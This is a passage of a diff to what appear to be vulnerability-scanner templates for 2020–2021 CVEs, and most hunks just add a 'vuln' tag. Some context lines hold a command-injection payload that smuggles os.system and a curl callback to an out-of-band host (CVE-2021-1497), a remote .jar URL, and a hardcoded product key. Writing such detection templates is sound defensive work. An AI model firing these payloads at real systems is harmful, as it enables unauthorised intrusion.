b/http/cves/2020/CVE-2020-5766.yaml index d0e00391087..f85cb5a2847 100644 --- a/http/cves/2020/CVE-2020-5766.yaml +++ b/http/cves/2020/CVE-2020-5766.yaml @@ -22,7 +22,7 @@ info: product: srs_simple_hits_counter framework: wordpress publicwww-query: "/wp-content/plugins/srs-simple-hits-counter/" - tags: cve,cve2020,srs-simple-hits-counter,wordpress,wp,wp-plugin,time-based-sqli,sqli,vkev + tags: cve,cve2020,srs-simple-hits-counter,wordpress,wp,wp-plugin,time-based-sqli,sqli,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 28219c35e46..746f294ee5a 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: instructure product: canvas_learning_management_service - tags: cve,cve2020,ssrf,oast,blind,tenable,instructure,vkev + tags: cve,cve2020,ssrf,oast,blind,tenable,instructure,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 93e4f5a0a5e..6943a38044f 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Magento" - http.component:"magento" - tags: cve,cve2020,magmi,magento,tenable,magmi_project,vkev + tags: cve,cve2020,magmi,magento,tenable,magmi_project,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index db5f395408a..18acaa5530a 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Magento" - http.component:"magento" - tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project + tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index 851f9d4ae91..7946ef28c91 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: unraid product: unraid - tags: cve2020,cve,rce,kev,unraid,vkev + tags: cve2020,cve,rce,kev,unraid,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 2542bb06739..5b86d428be9 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -37,7 +37,7 @@ info: shodan-query: http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2020,bigip,rce,kev,packetstorm,f5,vkev + tags: cve,cve2020,bigip,rce,kev,packetstorm,f5,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 21cf10b2bf6..7487005be87 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: communilink product: clink_office - tags: cve,cve2020,xss,clink-office,communilink + tags: cve,cve2020,xss,clink-office,communilink,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index e3818596144..a7760a50387 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sap product: solution_manager - tags: cve2020,cve,sap,solman,rce,kev,vkev + tags: cve2020,cve,sap,solman,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 9429ebffacc..5d73e7414ae 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -29,7 +29,7 @@ info: product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 - tags: cve,cve2020,sap,kev,vkev + tags: cve,cve2020,sap,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 44369533c9a..d1c933c9a70 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: sap product: businessobjects_business_intelligence_platform - tags: cve2020,cve,sap,ssrf,oast,unauth,vkev + tags: cve2020,cve,sap,ssrf,oast,unauth,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 103a6c6a3ca..8a138edc8d6 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -32,7 +32,7 @@ info: - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" - tags: cve,cve2020,sqli,opensis,os4ed + tags: cve,cve2020,sqli,opensis,os4ed,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index bc49a991084..ebec458b362 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -33,7 +33,7 @@ info: - body="javax.faces.ViewState" - body="javax.faces.viewstate" - body="javax.faces.resource" - tags: cve,cve2020,mojarra,lfi,eclipse + tags: cve,cve2020,mojarra,lfi,eclipse,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index a1ecd0d09d4..0583b107276 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -29,7 +29,7 @@ info: vendor: etoilewebdesign product: "ultimate_faq" framework: wordpress - tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign + tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index b74ef8bbf6f..1b341deee83 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: hpe product: smart_update_manager - tags: cve,cve2020,hp,auth-bypass,hpe,tenable,vkev + tags: cve,cve2020,hp,auth-bypass,hpe,tenable,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 7b03c00e5a5..292e70adf0d 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: hp product: linuxki - tags: cve,cve2020,rce,packetstorm,hp,vkev + tags: cve,cve2020,rce,packetstorm,hp,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index 61a6e78716c..77a755df663 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -32,7 +32,7 @@ info: max-request: 1 vendor: mcafee product: epolicy_orchestrator - tags: cve,cve2020,xss,mcafee + tags: cve,cve2020,xss,mcafee,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index b5989f4a16d..06452e19562 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: cve,cve2020,zimbra,ssrf,oast,synacor,vkev + tags: cve,cve2020,zimbra,ssrf,oast,synacor,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index e00a63cd877..15af68a07df 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: puppet product: puppet_enterprise - tags: cve2020,cve,puppet,exposure,puppetdb + tags: cve2020,cve,puppet,exposure,puppetdb,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 7943920b8bb..c4df878226c 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -29,7 +29,7 @@ info: - http.favicon.hash:129457226 - cpe:"cpe:2.3:a:liferay:liferay_portal" fofa-query: icon_hash=129457226 - tags: cve2020,cve,packetstorm,rce,liferay,kev,vkev + tags: cve2020,cve,packetstorm,rce,liferay,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 87df0926924..4089d7b4308 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -32,7 +32,7 @@ info: - http.title:"intellian aptus web" fofa-query: title="intellian aptus web" google-query: intitle:"intellian aptus web" - tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech,vkev + tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 34955d2870f..85fd6d7f74d 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -34,7 +34,7 @@ info: - icon_hash=106844876 - title="revive adserver" google-query: intitle:"revive adserver" - tags: cve,cve2020,xss,hackerone,revive-adserver,vkev + tags: cve,cve2020,xss,hackerone,revive-adserver,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 868166ac08e..e35526c1d08 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -27,7 +27,7 @@ info: vendor: rubyonrails product: rails shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" - tags: cve,cve2020,rails,rce,hackerone,rubyonrails + tags: cve,cve2020,rails,rce,hackerone,rubyonrails,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index a42d2196d69..6835c1f85f5 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: citrix product: application_delivery_controller_firmware - tags: cve,cve2020,citrix,xss,vkev + tags: cve,cve2020,citrix,xss,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index d002a1d6770..af920302be6 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -27,7 +27,7 @@ info: max-request: 6 vendor: citrix product: application_delivery_controller_firmware - tags: cve2020,cve,citrix,lfi,kev,packetstorm,vkev + tags: cve2020,cve,citrix,lfi,kev,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index a6efca895b1..d3592dc98f8 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: citrix product: application_delivery_controller_firmware - tags: cve,cve2020,citrix,vkev + tags: cve,cve2020,citrix,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 4a38dcf8b33..59da2323964 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -32,7 +32,7 @@ info: max-request: 1 vendor: citrix product: xenmobile_server - tags: cve2020,cve,citrix,lfi,xenmobile,vkev + tags: cve2020,cve,citrix,lfi,xenmobile,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 0dcfa366cc8..839035d7df1 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" - tags: cve,cve2020,fms,artica + tags: cve,cve2020,fms,artica,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 3a97891374b..d31157c3af5 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -32,7 +32,7 @@ info: - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" - tags: cve,cve2020,edb,packetstorm,xss,icewarp + tags: cve,cve2020,edb,packetstorm,xss,icewarp,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 9684fd66821..38e1d43e59f 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: draytek product: vigor2960_firmware - tags: cve,cve2020,rce,kev,draytek,vkev + tags: cve,cve2020,rce,kev,draytek,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index d9b6fd8ee5d..70b8d2bcf03 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/tutor/ fofa-query: body=/wp-content/plugins/tutor/ publicwww-query: /wp-content/plugins/tutor/ - tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum + tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum,vuln variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index fe7a1c6d60f..f8f50887c98 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: lotus_core_cms_project product: lotus_core_cms - tags: cve,cve2020,lfi,lotus,cms,edb,lotus_core_cms_project + tags: cve,cve2020,lfi,lotus,cms,edb,lotus_core_cms_project,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index c44bc5ad246..08330d793d2 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: playsms product: playsms - tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce,vkev + tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index 8dffce8c656..9dc2da387f8 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: eyesofnetwork product: eyesofnetwork - tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli,passive + tags: cve2020,cve,cisa,eyesofnetwork,rce,authenticated,msf,sqli,passive,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-8656.yaml b/http/cves/2020/CVE-2020-8656.yaml index 32872c2414f..ccb3246bff2 100644 --- a/http/cves/2020/CVE-2020-8656.yaml +++ b/http/cves/2020/CVE-2020-8656.yaml @@ -24,7 +24,7 @@ info: vendor: eyesofnetwork product: eyesofnetwork fofa-query: title="EyesOfNetwork" - tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli + tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8657.yaml b/http/cves/2020/CVE-2020-8657.yaml index 5c6a445b91f..b8dca5f20d2 100644 --- a/http/cves/2020/CVE-2020-8657.yaml +++ b/http/cves/2020/CVE-2020-8657.yaml @@ -28,7 +28,7 @@ info: product: eyesofnetwork shodan-query: html:"EyesOfNetwork" fofa-query: title="EyesOfNetwork" - tags: cve,cve2020,eyesofnetwork,hardcoded-key,kev,vkev + tags: cve,cve2020,eyesofnetwork,hardcoded-key,kev,vkev,vuln variables: key: "€On@piK3Y" diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index e5a696cf633..b205d6771d0 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -28,7 +28,7 @@ info: vendor: wptimecapsule product: wp_time_capsule framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,wptimecapsule + tags: cve,cve2020,wordpress,wp-plugin,wptimecapsule,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index cb3144f3741..3fbd11b3e21 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -29,7 +29,7 @@ info: vendor: revmakx product: infinitewp_client framework: wordpress - tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx + tags: cve,cve2020,wpscan,wordpress,wp-plugin,wp,infinitewp,auth-bypass,revmakx,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 5cd979a0853..786f0cd885c 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: cve2020,cve,cacti,rce,oast,vkev + tags: cve2020,cve,cacti,rce,oast,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index b4195f9260a..8bf69af46b6 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: citrix product: sharefile_storagezones_controller - tags: cve2020,cve,citrix,lfi,vkev + tags: cve2020,cve,citrix,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index 25949ee8bfc..dff726737c7 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"jeedom" fofa-query: title="jeedom" google-query: intitle:"jeedom" - tags: cve,cve2020,xss,jeedom + tags: cve,cve2020,xss,jeedom,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index 2c55ee134ea..8de66c8677f 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -30,7 +30,7 @@ info: vendor: wpcentral product: wpcentral framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,vkev + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index 5d3628afef8..a5bbfc1b28c 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: johnsoncontrols product: exacqvision_enterprise_manager - tags: cve,cve2020,rce,exacqvision,johnsoncontrols + tags: cve,cve2020,rce,exacqvision,johnsoncontrols,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index 98fc03b636b..c069c58b008 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zyxel product: nas326_firmware - tags: cve2020,cve,rce,zyxel,injection,kev,vkev + tags: cve2020,cve,rce,zyxel,injection,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index e1dfbf91030..e2655edc5c3 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -29,7 +29,7 @@ info: vendor: oracle product: iplanet_web_server shodan-query: cpe:"cpe:2.3:a:oracle:iplanet_web_server" - tags: cve,cve2020,oracle,auth-bypass,iplanet + tags: cve,cve2020,oracle,auth-bypass,iplanet,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index ae1b41970d5..3207f2e71d7 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve2020,cve,atlassian,jira,xss,vkev + tags: cve2020,cve,atlassian,jira,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 69fdd2327a0..5c8d036ea89 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: dlink product: dir-610_firmware - tags: cve,cve2020,dlink,disclosure,router + tags: cve,cve2020,dlink,disclosure,router,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 246575372d1..683bfe3d713 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -27,7 +27,7 @@ info: vendor: djangoproject product: django shodan-query: cpe:"cpe:2.3:a:djangoproject:django" - tags: cve,cve2020,django,sqli,vulhub,djangoproject + tags: cve,cve2020,django,sqli,vulhub,djangoproject,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 5364d316db3..984f408eaf5 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig.exposure,rconfig + tags: cve,cve2020,rconfig.exposure,rconfig,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9480.yaml b/http/cves/2020/CVE-2020-9480.yaml index a871faec0b7..0765637aa14 100644 --- a/http/cves/2020/CVE-2020-9480.yaml +++ b/http/cves/2020/CVE-2020-9480.yaml @@ -22,7 +22,7 @@ info: vendor: apache product: spark fofa-query: port="6066" && banner="Spark Master" - tags: cve,cve2020,apache,spark,auth-bypass,vkev + tags: cve,cve2020,apache,spark,auth-bypass,vkev,vuln variables: url: "http://{{interactsh-url}}/{{rand_text_alpha(5)}}.jar" diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 80123c44f1d..0cf23031447 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: skywalking - tags: cve,cve2020,sqli,skywalking,apache + tags: cve,cve2020,sqli,skywalking,apache,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index 74315cc9bce..816c42294e9 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -42,7 +42,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2020,cve,rce,packetstorm,apache,tomcat + tags: cve2020,cve,rce,packetstorm,apache,tomcat,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index f9c4238eb11..dd5630fc0d3 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="ofbiz" - app="apache_ofbiz" - tags: cve,cve2020,ofbiz,packetstorm,apache,java,vkev + tags: cve,cve2020,ofbiz,packetstorm,apache,java,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-9547.yaml b/http/cves/2020/CVE-2020-9547.yaml index 8f4377cec62..2fa0cbf14ec 100644 --- a/http/cves/2020/CVE-2020-9547.yaml +++ b/http/cves/2020/CVE-2020-9547.yaml @@ -27,7 +27,7 @@ info: vendor: fasterxml product: jackson-databind verified: true - tags: cve,cve2020,jackson,databind,deserialization,rce,vkev + tags: cve,cve2020,jackson,databind,deserialization,rce,vkev,vuln variables: randstr: "{{rand_text_alphanumeric(8)}}" diff --git a/http/cves/2020/CVE-2020-9548.yaml b/http/cves/2020/CVE-2020-9548.yaml index 4a2be76824f..2a59d2814c6 100644 --- a/http/cves/2020/CVE-2020-9548.yaml +++ b/http/cves/2020/CVE-2020-9548.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: fasterxml product: jackson-databind - tags: cve,cve2020,jackson,fasterxml,rce,vkev + tags: cve,cve2020,jackson,fasterxml,rce,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 3ce3d6cdb96..cb3955c5c6f 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-47932290 - body=craftcms publicwww-query: craftcms - tags: cve,cve2020,ssti,craftcms,vkev + tags: cve,cve2020,ssti,craftcms,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index da83a8d0f74..b38afe02f2a 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -33,7 +33,7 @@ info: - http.html:"Cisco rv340" - http.html:"cisco rv340" fofa-query: body="cisco rv340" - tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive,vkev + tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index 0a8212026bb..279c9896797 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: cisco product: hyperflex_hx_data_platform - tags: cve,cve2021,cisco,rce,oast,kev,packetstorm,vkev + tags: cve,cve2021,cisco,rce,oast,kev,packetstorm,vkev,vuln variables: cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"' payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("' diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 842b7a860bd..6e70527689f 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: cisco product: hyperflex_hx_data_platform - tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai,vkev + tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 2c50ae7a330..2f0fc7eb702 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: hyperflex_hx220c_af_m5 - tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco + tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-20021.yaml b/http/cves/2021/CVE-2021-20021.yaml index e3bc6b55434..1a947df1a0d 100644 --- a/http/cves/2021/CVE-2021-20021.yaml +++ b/http/cves/2021/CVE-2021-20021.yaml @@ -22,7 +22,7 @@ info: shodan-query: product:"SonicWALL Email Security" vendor: sonicwall product: email_security - tags: cve,cve2021,sonicwall,email-security,auth-bypass,kev,passive,vkev + tags: cve,cve2021,sonicwall,email-security,auth-bypass,kev,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 00e3f1727e5..a008846418a 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ 